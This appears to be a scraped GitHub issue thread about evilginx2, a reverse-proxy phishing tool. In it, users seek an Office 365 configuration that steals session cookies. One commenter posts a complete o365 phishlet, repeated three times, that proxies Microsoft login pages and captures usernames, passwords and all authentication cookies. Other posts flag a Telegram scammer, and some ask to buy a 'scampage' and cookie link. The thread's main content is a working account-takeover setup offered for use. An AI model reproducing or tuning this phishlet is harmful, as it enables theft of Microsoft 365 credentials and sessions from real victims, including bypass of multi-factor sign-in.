evilginx2
evilginx2 copied to clipboard
kgretzky
Is there a working o365 method that grabs cookies (I have tried all the suggestions).
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
auth_urls:
- '/kmsi*'
Seems like an issue with your authentication tokens but will have to see how your o365 phishlet is coded to tell
Auth URL: kmsi should end with an asterisk
/kmsi*
also are you sure you aren't using a live.com account to test? that would give cookies under a domain evilginx isn't listening for.
I can give you the phishlet as well if it's still not capturing
Support was able to make my o365 phishlets forward results to mail and it was all on the .yaml best you work with some experience https://icq.im/mrgretzky could help fix your phishlet issue
Scammer noticed
Feel free to mark his messages. Anybody giving coins to that account deserves to lose them: "Talk to the author", spare me the laughter
Lol don't telegram me, or anybody for it: here's the o365 that captures cookies. I also have one which removes and doesn't get stuck on the long "Please wait, loading" modal, only captures the auth cookies (no regex) and has email prefill (not even saying it support's all [non o365] emails)
name: "o365" author: "@456478" min_ver: "2.3.0" proxy_hosts: - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false } - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false } - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false } sub_filters: - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] } - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true } - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] } - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] } auth_tokens: - domain: ".microsoftonline.com" keys: [".*,regexp"] force_post: - path: "/ppsecure/post*" search: - { key: "LoginOptions", search: "1" } force: - { key: "DontShowAgain", value: "true" } type: "post" auth_urls: - "/kmsi*" credentials: username: key: '(login|UserName)' search: '(.*)' password: key: '(passwd|Password)' search: '(.*)' login: domain: "login.microsoftonline.com" path: "/"
When I open the Phishlets its works but when i click on sign in it give me no server found ?
i got it working, took me a few hours to figure it out, so pretty sure anyone else can get it working :)
i got it working, took me a few hours to figure it out, so pretty sure anyone else can get it working :)
Lol don't telegram me, or anybody for it: here's the o365 that captures cookies. I also have one which removes and doesn't get stuck on the long "Please wait, loading" modal, only captures the auth cookies (no regex) and has email prefill (not even saying it support's all [non o365] emails)
name: "o365" author: "@456478" min_ver: "2.3.0" proxy_hosts: - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false } - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false } - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false } sub_filters: - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] } - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true } - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] } - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] } auth_tokens: - domain: ".microsoftonline.com" keys: [".*,regexp"] force_post: - path: "/ppsecure/post*" search: - { key: "LoginOptions", search: "1" } force: - { key: "DontShowAgain", value: "true" } type: "post" auth_urls: - "/kmsi*" credentials: username: key: '(login|UserName)' search: '(.*)' password: key: '(passwd|Password)' search: '(.*)' login: domain: "login.microsoftonline.com" path: "/"
[  ](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif) [ ](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)When I open the Phishlets its works but when i click on sign in it give me no server found ?
Were you able to make it work for adfs?
Lol don't telegram me, or anybody for it: here's the o365 that captures cookies. I also have one which removes and doesn't get stuck on the long "Please wait, loading" modal, only captures the auth cookies (no regex) and has email prefill (not even saying it support's all [non o365] emails)
name: "o365" author: "@456478" min_ver: "2.3.0" proxy_hosts: - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false } - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false } - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false } sub_filters: - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] } - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true } - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] } - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] } auth_tokens: - domain: ".microsoftonline.com" keys: [".*,regexp"] force_post: - path: "/ppsecure/post*" search: - { key: "LoginOptions", search: "1" } force: - { key: "DontShowAgain", value: "true" } type: "post" auth_urls: - "/kmsi*" credentials: username: key: '(login|UserName)' search: '(.*)' password: key: '(passwd|Password)' search: '(.*)' login: domain: "login.microsoftonline.com" path: "/"
[  ](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif) [ ](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)When I open the Phishlets its works but when i click on sign in it give me no server found ?
Can you share the scampage please? 🙏🏼
Can you please the Scampage and the cookies link again i want to buy pls
